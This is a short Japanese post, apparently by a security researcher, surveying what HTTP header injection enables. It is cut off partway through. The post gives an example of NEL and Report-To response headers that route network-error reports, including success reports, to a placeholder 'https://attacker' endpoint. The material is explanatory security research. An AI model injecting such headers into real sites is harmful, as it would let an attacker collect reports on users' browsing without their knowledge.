HTTPヘッダインジェクションにおいて何ができるか?というのを数年ぶりに整理している。整理作業の中で見つけたものの1つは、ネットワークエラーを検出して報告するNEL(Network Error Logging)という仕組み。以下はNELの応答ヘッダの例。NEL: {"report_to":"test", "max_age":1000, "success_fraction":1}Report-To: {"group":"test", "max_age":1000, "endpoints":[{"url":"https://attacker"}]}上のようにReport-Toヘッダと組合せて使う。…